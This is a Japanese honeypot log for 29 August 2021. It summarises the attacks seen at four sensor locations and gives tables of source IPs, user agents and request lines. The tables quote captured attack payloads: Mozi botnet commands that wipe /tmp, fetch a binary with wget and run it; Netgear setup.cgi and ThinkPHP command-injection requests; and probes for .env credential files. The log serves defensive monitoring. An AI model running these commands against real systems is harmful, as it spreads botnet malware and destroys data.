ハニーポット(仮) 観測記録 2021/08/29分です。
特徴
共通
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
/.envへのスキャン行為
Apache Solrへのスキャン行為
WordPress Pluginへのスキャン行為
Location:JP
aiohttpによるスキャン行為
gbrmssによるスキャン行為
Laravelへのスキャン行為
45[.]89[.]124[.]41に関する不正通信
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http[:]//192[.]168[.]1[.]1:8088/Mozi.a; chmod 777 Mozi[.]a; /tmp/Mozi.a jaws
Location:US
gbrmssによるスキャン行為
Laravelへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http[:]//192[.]168[.]1[.]1:8088/Mozi.a; chmod 777 Mozi[.]a; /tmp/Mozi.a jaws
Location:UK
gbrmssによるスキャン行為
phpMyAdminへのスキャン行為
45[.]89[.]124[.]41に関する不正通信
Gh0stRATのような動き
を確認しました。
Location:SG
Laravelへのスキャン行為
を確認しました。
他
アクセス数推移
JP:総アクセス数:67 (前日比:-43)
US:総アクセス数:61 (前日比:-13)
UK:総アクセス数:245 (前日比:+132)
SG:総アクセス数:54 (前日比:-13)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
14 | 3.237.173.22 | United States |
1 | 20.150.138.171 | United States |
1 | 27.115.124.100 | China |
6 | 45.79.137.118 | United States |
1 | 45.79.187.164 | United States |
1 | 45.93.249.208 | Germany |
1 | 45.95.147.10 | Netherlands |
11 | 45.146.164.110 | Russia |
2 | 47.242.247.47 | United States |
3 | 68.183.196.51 | United States |
1 | 77.247.108.81 | Belize |
1 | 102.129.145.41 | South Africa |
1 | 113.178.237.148 | Vietnam |
1 | 134.209.206.219 | United States |
1 | 138.68.142.201 | United States |
1 | 143.244.178.188 | United States |
1 | 167.99.143.31 | United States |
1 | 167.172.47.41 | United States |
1 | 173.255.200.214 | United States |
1 | 180.149.125.175 | Mongolia |
3 | 185.53.90.24 | Belize |
1 | 192.241.200.226 | United States |
1 | 192.241.216.102 | United States |
1 | 192.241.218.185 | United States |
1 | 193.242.145.12 | Russia |
1 | 194.110.114.149 | Romania |
2 | 199.19.224.165 | United States |
3 | 205.185.126.200 | United States |
2 | 209.141.32.217 | United States |
1 | 223.152.8.247 | China |
UserAgent一覧
件数 | UserAgent |
---|---|
12 | - |
3 | Go-http-client/1.1 |
1 | Hello, world |
2 | Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36 |
3 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 |
11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.73 |
1 | Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 |
5 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
5 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
3 | Mozilla/5.0 zgrab/0.x |
1 | Python/3.7 aiohttp/3.7.4.post0 |
1 | gbrmss/7.29.0 |
1 | python-requests/2.18.4 |
14 | python-requests/2.26.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
5 | \x16\x03\x01 | ||
1 | \x16\x03\x01\x01\xfa\x01 | ||
1 | CONNECT | 45[.]89[.]124[.]41:4444 | HTTP/1.1 |
7 | GET | /.env | HTTP/1.1 |
1 | GET | /.env.production.local | HTTP/1.1 |
1 | GET | //favicon[.]ico | HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content= |
HTTP/1.1 |
2 | GET | /_ignition/execute-solution | HTTP/1.1 |
1 | GET | /actuator/health | HTTP/1.1 |
1 | GET | /admin/.env | HTTP/1.1 |
1 | GET | /admin/config.php | HTTP/1.1 |
1 | GET | /api/.env | HTTP/1.1 |
1 | GET | /api/vmware/opsmanager1/service.asp | HTTP/1.1 |
1 | GET | /app/.env | HTTP/1.1 |
1 | GET | /beta/.env | HTTP/1.1 |
1 | GET | /cgi-bin/login.cgi | HTTP/1.1 |
1 | GET | /config/.env | HTTP/1.1 |
2 | GET | /config/getuser?index=0 | HTTP/1.1 |
1 | GET | /console/ | HTTP/1.1 |
1 | GET | /core/.env | HTTP/1.1 |
1 | GET | /core/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
2 | GET | /favicon.ico | HTTP/1.1 |
1 | GET | /hudson | HTTP/1.1 |
1 | GET | /index.php | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 | HTTP/1.1 |
1 | GET | /kyc/.env | HTTP/1.1 |
1 | GET | /laravel/.env | HTTP/1.1 |
1 | GET | /laravel/core/.env | HTTP/1.1 |
2 | GET | /manifest.json | HTTP/1.1 |
1 | GET | /phpmyadmin/scripts/setup.php | HTTP/1.1\n |
1 | GET | /portal/redlion | HTTP/1.1 |
1 | GET | /prod/.env | HTTP/1.1 |
1 | GET | /public/.env | HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//113[.]178[.]237[.]148:41846/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 | HTTP/1.0 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws | HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /stalker_portal/server/tools/auth_simple.php | HTTP/1.1 |
2 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | GET | /wp-content/plugins/wp-file-manager/readme.txt | HTTP/1.1 |
3 | GET | http[:]//azenv[.]net/ | HTTP/1.1 |
1 | HEAD | /robots.txt | HTTP/1.0 |
1 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
1 | POST | /api/jsonws/invoke | HTTP/1.1 |
5 | POST | /boaform/admin/formLogin | HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 20.150.138.171 | United States |
2 | 20.185.250.61 | United States |
2 | 43.251.85.96 | Bangladesh |
2 | 45.42.200.161 | United States |
1 | 45.95.147.10 | Netherlands |
22 | 45.146.164.110 | Russia |
1 | 77.247.108.81 | Belize |
1 | 115.97.195.39 | India |
1 | 143.244.178.188 | United States |
2 | 144.126.133.142 | United States |
1 | 159.65.151.157 | United States |
1 | 164.90.129.154 | United States |
2 | 173.255.200.214 | United States |
1 | 178.72.71.124 | Russia |
1 | 180.149.125.175 | Mongolia |
4 | 183.136.225.14 | China |
4 | 185.53.90.24 | Belize |
1 | 192.241.198.76 | United States |
1 | 192.241.198.89 | United States |
1 | 192.241.202.63 | United States |
4 | 199.19.224.165 | United States |
3 | 205.185.126.200 | United States |
1 | 209.17.96.18 | United States |
1 | 209.141.32.217 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
12 | - |
4 | Go-http-client/1.1 |
1 | Hello, world |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 |
22 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 |
4 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE |
4 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
4 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
4 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
3 | Mozilla/5.0 zgrab/0.x |
1 | gbrmss/7.29.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
4 | \x03 | ||
1 | \x16\x03\x01 | ||
1 | \x16\x03\x01\x01\xfb\x01 | ||
4 | GET | /.env | HTTP/1.1 |
2 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
2 | GET | /?a=fetch&content= |
HTTP/1.1 |
2 | GET | /_ignition/execute-solution | HTTP/1.1 |
1 | GET | /actuator/health | HTTP/1.1 |
1 | GET | /admin/config.php | HTTP/1.1 |
2 | GET | /cgi-bin/login.cgi | HTTP/1.1 |
4 | GET | /config/getuser?index=0 | HTTP/1.1 |
2 | GET | /console/ | HTTP/1.1 |
2 | GET | /favicon.ico | HTTP/1.1 |
1 | GET | /hudson | HTTP/1.1 |
1 | GET | /index.php | HTTP/1.1 |
2 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 | HTTP/1.1 |
1 | GET | /phpmyadmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /portal/redlion | HTTP/1.1 |
2 | GET | /robots.txt | HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//115[.]97[.]195[.]39:54609/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 | HTTP/1.0 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws | HTTP/1.1 |
2 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /stalker_portal/server/tools/auth_simple.php | HTTP/1.1 |
3 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
2 | GET | /wp-content/plugins/wp-file-manager/readme.txt | HTTP/1.1 |
4 | GET | http[:]//azenv[.]net/ | HTTP/1.1 |
1 | HEAD | /robots.txt | HTTP/1.0 |
2 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
2 | POST | /api/jsonws/invoke | HTTP/1.1 |
4 | POST | /boaform/admin/formLogin | HTTP/1.1 |
2 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:UK
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
101 | 5.251.54.97 | Kazakhstan |
2 | 45.93.250.34 | Germany |
1 | 45.95.147.10 | Netherlands |
11 | 45.146.164.110 | Russia |
1 | 46.101.250.38 | United States |
1 | 49.143.32.6 | South Korea |
1 | 66.240.205.34 | United States |
1 | 77.247.108.81 | Belize |
2 | 80.82.78.39 | United Kingdom |
101 | 99.210.65.198 | Canada |
3 | 111.67.194.177 | China |
1 | 144.86.173.150 | United States |
1 | 159.203.33.94 | United States |
1 | 173.255.200.214 | United States |
1 | 180.149.125.175 | Mongolia |
3 | 185.53.90.24 | Belize |
1 | 185.90.136.173 | Netherlands |
1 | 192.241.204.160 | United States |
3 | 199.19.224.165 | United States |
3 | 205.185.115.135 | United States |
4 | 205.185.126.200 | United States |
1 | 209.141.32.217 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
8 | - |
3 | Go-http-client/1.1 |
1 | Mozilla/5.0 |
202 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 |
3 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3464.0 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36 OPR/56.0.3051.52 |
11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 |
1 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
8 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
3 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
1 | Mozilla/5.0 zgrab/0.x |
1 | gbrmss/7.29.0 |
1 | python-requests/2.18.4 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | Gh0st\xad | ||
2 | \x16\x03\x01 | ||
2 | CONNECT | 45[.]89[.]124[.]41:4444 | HTTP/1.1 |
1 | GET | /.env | HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content= |
HTTP/1.1 |
1 | GET | /Login.html | HTTP/1.1 |
2 | GET | /_ignition/execute-solution | HTTP/1.1 |
1 | GET | /actuator/health | HTTP/1.1 |
1 | GET | /admin/config.php | HTTP/1.1 |
1 | GET | /cgi-bin/login.cgi | HTTP/1.1 |
3 | GET | /config/getuser?index=0 | HTTP/1.1 |
1 | GET | /console/ | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 | HTTP/1.1 |
202 | GET | /phpmyadmin/ | HTTP/1.1 |
1 | GET | /phpmyadmin/index.php | HTTP/1.1 |
1 | GET | /phpmyadmin4.8.5/index.php | HTTP/1.1 |
1 | GET | /pmd/index.php | HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 | HTTP/1.0 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /somesomesome.txt | HTTP/1.1 |
1 | GET | /stalker_portal/server/tools/auth_simple.php | HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | GET | /wp-content/plugins/wp-file-manager/readme.txt | HTTP/1.1 |
3 | GET | http[:]//azenv[.]net/ | HTTP/1.1 |
1 | HEAD | /robots.txt | HTTP/1.0 |
1 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
1 | POST | /api/jsonws/invoke | HTTP/1.1 |
8 | POST | /boaform/admin/formLogin | HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:SG
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
2 | 13.92.90.223 | United States |
1 | 45.95.147.10 | Netherlands |
11 | 45.146.164.110 | Russia |
3 | 51.158.78.179 | France |
1 | 112.245.150.166 | China |
1 | 134.209.206.219 | United States |
4 | 138.199.14.131 | United Kingdom |
1 | 144.86.173.81 | United States |
1 | 167.172.47.41 | United States |
1 | 173.255.200.214 | United States |
1 | 180.149.125.175 | Mongolia |
2 | 183.136.225.14 | China |
3 | 185.53.90.24 | Belize |
1 | 192.241.196.194 | United States |
1 | 192.241.221.35 | United States |
1 | 199.19.224.165 | United States |
2 | 205.185.115.135 | United States |
4 | 205.185.126.200 | United States |
1 | 209.17.96.146 | United States |
12 | 212.192.219.62 | Czechia |
UserAgent一覧
件数 | UserAgent |
---|---|
8 | - |
3 | Go-http-client/1.1 |
2 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
12 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 |
2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 |
11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE |
3 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
6 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
2 | Mozilla/5.0 zgrab/0.x |
1 | python-requests/2.18.4 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
2 | \x16\x03\x01 | ||
1 | \x16\x03\x01\x02 | ||
1 | CONNECT | www[.]bing[.]com:443 | HTTP/1.1 |
9 | GET | /.env | HTTP/1.1 |
1 | GET | /.twilio.env | HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content= |
HTTP/1.1 |
2 | GET | /_ignition/execute-solution | HTTP/1.1 |
1 | GET | /actuator/health | HTTP/1.1 |
1 | GET | /api/.env | HTTP/1.1 |
1 | GET | /cgi-bin/login.cgi | HTTP/1.1 |
1 | GET | /config/getuser?index=0 | HTTP/1.1 |
1 | GET | /console/ | HTTP/1.1 |
1 | GET | /env.dev | HTTP/1.1 |
1 | GET | /env.prod | HTTP/1.1 |
1 | GET | /env.stage | HTTP/1.1 |
1 | GET | /favicon.ico | HTTP/1.1 |
1 | GET | /index.php | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 | HTTP/1.1 |
1 | GET | /portal/redlion | HTTP/1.1 |
1 | GET | /robots.txt | HTTP/1.1 |
2 | GET | /sendgrid.env | HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//112[.]245[.]150[.]166:57740/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 | HTTP/1.0 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /stalker_portal/server/tools/auth_simple.php | HTTP/1.1 |
1 | GET | /twilio.env | HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | GET | /wp-content/plugins/wp-file-manager/readme.txt | HTTP/1.1 |
3 | GET | http[:]//azenv[.]net/ | HTTP/1.1 |
1 | GET | http[:]//www[.]bing[.]com/ | HTTP/1.1 |
1 | HEAD | /robots.txt | HTTP/1.0 |
1 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
1 | POST | /api/jsonws/invoke | HTTP/1.1 |
6 | POST | /boaform/admin/formLogin | HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | POST | http[:]//juliaoglesbee[.]site/9c598c06b2370c48d28c7876198760e81aa2ce8837de3445bda3d6e040c910f27cf64a854acd6dedc1c9955f9aa8242ea6bc4435215fded087207e9e5a29fb3b0779637258f6c8717ee675ef5b281877ffda45037d856228264a441bf530b3ef | HTTP/1.1 |